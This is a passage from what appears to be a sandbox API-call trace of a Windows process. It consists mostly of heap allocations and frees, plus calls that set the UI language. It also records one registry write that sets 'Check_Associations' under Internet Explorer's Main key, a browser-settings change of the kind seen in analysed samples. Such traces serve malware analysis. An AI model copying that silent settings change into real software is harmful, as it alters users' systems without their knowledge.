dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4d55f0 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0208 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d01e8 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0088 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00a8 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00c8 [0048.570] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00e8 [0048.571] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.571] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4ef3b8 [0048.571] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.571] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x70) returned 0x4ef818 [0048.571] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e23a0 [0048.571] SetLastError (dwErrCode=0x0) [0048.571] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.571] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9888 [0048.572] SetLastError (dwErrCode=0x0) [0048.572] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9888, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9888, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c98a8 [0048.572] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4d02c8 [0048.572] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4d02c8, pulNumLanguages=0xcdf270 | out: pulNumLanguages=0xcdf270) returned 1 [0048.572] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02c8 | out: hHeap=0x490000) returned 1 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b81c0 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02c8 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02a8 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0288 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0268 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0248 [0048.572] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0228 [0048.573] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4edc40 [0048.575] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.576] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f0d08 [0048.576] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.576] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f0f00 [0048.576] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4fb8b8 [0048.577] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f0f00 | out: hHeap=0x490000) returned 1 [0048.578] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4f0f00 [0048.579] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4fb8b8 | out: hHeap=0x490000) returned 1 [0048.579] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f0d08 | out: hHeap=0x490000) returned 1 [0048.579] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x54) returned 0x4e0050 [0048.579] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x26) returned 0x4ddd18 [0048.580] GetTickCount () returned 0x19f56de [0048.580] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\Main", ulOptions=0x0, samDesired=0x2, phkResult=0xcdf0bc | out: phkResult=0xcdf0bc*=0x20c) returned 0x0 [0048.580] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef938 [0048.580] RegSetValueExW (hKey=0x20c, lpValueName="Check_Associations", Reserved=0x0, dwType=0x1, lpData=0x4ef938, cbData=0x6) returned 0x0 [0048.581] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef938 | out: hHeap=0x490000) returned 1 [0048.581] RegCloseKey (hKey=0x20c) returned 0x0 [0048.583] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddd18 | out: hHeap=0x490000) returned 1 [0048.583] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e0050 | out: hHeap=0x490000) returned 1 [0048.583] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f0f00 | out: hHeap=0x490000) returned 1 [0048.584] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4edc40 | out: hHeap=0x490000) returned 1 [0048.584] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02c8 | out: hHeap=0x490000) returned 1 [0048.584] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02a8 | out: hHeap=0x490000) returned 1 [0048.584] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0288 | out: hHeap=0x490000) returned 1 [0048.584] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0268 | out: hHeap=0x490000) returned 1 [0048.584] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0248 | out: hHeap=0x490000) returned 1 [0048.584] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0228 | out: hHeap=0x490000) returned 1 [0048.585] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b81c0 | out: hHeap=0x490000) returned 1 [0048.585] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9888 [0048.585] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4c9888, pulNumLanguages=0xcdf284 | out: pulNumLanguages=0xcdf284) returned 1 [0048.585] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.585] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c98a8 | out: hHeap=0x490000) returned 1 [0048.585] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d55f0 | out: hHeap=0x490000) returned 1 [0048.585] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0208 | out: hHeap=0x490000) returned 1 [0048.585] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.585] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0088 | out: hHeap=0x490000) returned 1 [0048.585] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00a8 | out: hHeap=0x490000) returned 1 [0048.586] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00c8 | out: hHeap=0x490000) returned 1 [0048.586] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.586] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7cc0 | out: hHeap=0x490000) returned 1 [0048.587] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef3b8 | out: hHeap=0x490000) returned 1 [0048.587] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e23a0 | out: hHeap=0x490000) returned 1 [0048.587] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef818 | out: hHeap=0x490000) returned 1 Thread: id = 87 os_tid = 0xf24 Thread: id = 88 os_tid = 0xf28 [0096.868] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c89c8 | out: hHeap=0x490000) returned 1 [0096.868] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cff28 | out: hHeap=0x490000) returned 1 [0096.869] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd988 | out: hHeap=0x490000) returned 1 [0096.869] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dec60 | out: hHeap=0x490000) returned 1 [0096.870] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cff08 | out: hHeap=0x490000) returned 1 [0096.870] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd958 | out: hHeap=0x490000) returned 1 [0096.871] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dfb70 | out: hHeap=0x490000) returned 1 [0096.871] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfee8 | out: hHeap=0x490000) returned 1 [0096.871] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd928 | out: hHeap=0x490000) returned 1 [0096.872] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2108 | out: hHeap=0x490000) returned 1 [0096.872] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfec8 | out: hHeap=0x490000) returned 1 [0096.872] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd8f8 | out: hHeap=0x490000) returned 1 [0096.872] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c8978 | out: hHeap=0x490000) returned 1 [0096.872] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfea8 | out: hHeap=0x490000) returned 1 [0096.872] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd8c8 | out: hHeap=0x490000) returned 1 [0096.873] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dfb10 | out: hHeap=0x490000) returned 1 [0096.873] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d53e8 | out: hHeap=0x490000) returned 1 [0096.873] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd898 | out: hHeap=0x490000) returned 1 [0096.873] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e20a0 | out: hHeap=0x490000) returned 1 [0096.873] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfe88 | out: hHeap=0x490000) returned 1 [0096.874] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd868 | out: hHeap=0x490000) returned 1 [0096.874] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2030 | out: hHeap=0x490000) returned 1 [0096.874] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d5488 | out: hHeap=0x490000) returned 1 [0096.874] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd838 | out: hHeap=0x490000) returned 1 [0096.874] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e1fc0 | out: hHeap=0x490000) returned 1 [0096.875] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfe68 | out: hHeap=0x490000) returned 1 [0096.875] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd808 | out: hHeap=0x490000) returned 1 [0096.876] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4de040 | out: hHeap=0x490000) returned 1 [0096.876] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd7d8 | out: hHeap=0x490000) returned 1 [0096.877] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e1f58 | out: hHeap=0x490000) returned 1 [0096.878] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d5500 | out: hHeap=0x490000) returned 1 [0096.884] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd7a8 | out: hHeap=0x490000) returned 1 [0096.885] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd778 | out: hHeap=0x490000) returned 1 [0096.885] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfe48 | out: hHeap=0x490000) returned 1 [0096.885] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ccaa0 | out: hHeap=0x490000) returned 1 [0096.886] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cca70 | out: hHeap=0x490000) returned 1 [0096.886] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfe28 | out: hHeap=0x490000) returned 1 [0096.887] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cca40 | out: hHeap=0x490000) returned 1 [0096.887] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cca10 | out: hHeap=0x490000) returned 1 [0096.887] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfe08 | out: hHeap=0x490000) returned 1 [0096.888] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cc9e0 | out: hHeap=0x490000) returned 1 [0096.888] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cc9b0 | out: hHeap=0x490000) returned 1 [0096.888] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfde8 | out: hHeap=0x490000) returned 1 [0096.888] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cc980 | out: hHeap=0x490000) returned 1 [0096.888] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d54d8 | out: hHeap=0x490000) returned 1 [0096.889] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfda8 | out: hHeap=0x490000) returned 1 [0096.889] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cc950 | out: hHeap=0x490000) returned 1 [0096.889] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c8928 | out: hHeap=0x490000) returned 1 [0096.889] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cfdc8 | out: hHeap=0x490000) returned 1 [0096.890] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cc920 | out: hHeap=0x490000) returned 1 [0126.993] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e0ff0 | out: hHeap=0x490000) returned 1 [0126.993] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e0fb0 | out: hHeap=0x490000) returned 1 Thread: id = 94 os_tid = 0xf48 [0096.855] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddcb8 | out: hHeap=0x490000) returned 1 [0096.857] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e9f58 | out: hHeap=0x490000) returned 1 [0096.858] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c8ce8 | out: hHeap=0x490000) returned 1 [0096.858] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddb38 | out: hHeap=0x490000) returned 1 [0096.859] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e6770 | out: hHeap=0x490000) returned 1 [0096.860] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0148 | out: hHeap=0x490000) returned 1 [0096.860] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0168 | out: hHeap=0x490000) returned 1 [0096.860] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0188 | out: hHeap=0x490000) returned 1 [0096.860] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01a8 | out: hHeap=0x490000) returned 1 [0096.860] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01c8 | out: hHeap=0x490000) returned 1 [0096.861] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7ec0 | out: hHeap=0x490000) returned 1 [0096.861] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9848 | out: hHeap=0x490000) returned 1 [0096.861] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e6720 | out: hHeap=0x490000) returned 1 [0096.861] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8970 | out: hHeap=0x490000) returned 1 [0096.861] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8958 | out: hHeap=0x490000) returned 1 [0096.862] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c8d38 | out: hHeap=0x490000) returned 1 [0096.862] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e66d0 | out: hHeap=0x490000) returned 1 [0096.862] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89a0 | out: hHeap=0x490000) returned 1 [0096.862] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8988 | out: hHeap=0x490000) returned 1 [0096.863] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c8d88 | out: hHeap=0x490000) returned 1 [0096.863] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e70e8 | out: hHeap=0x490000) returned 1 [0096.864] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c8c98 | out: hHeap=0x490000) returned 1 [0096.865] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddb68 | out: hHeap=0x490000) returned 1 [0096.865] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e9bf0 | out: hHeap=0x490000) returned 1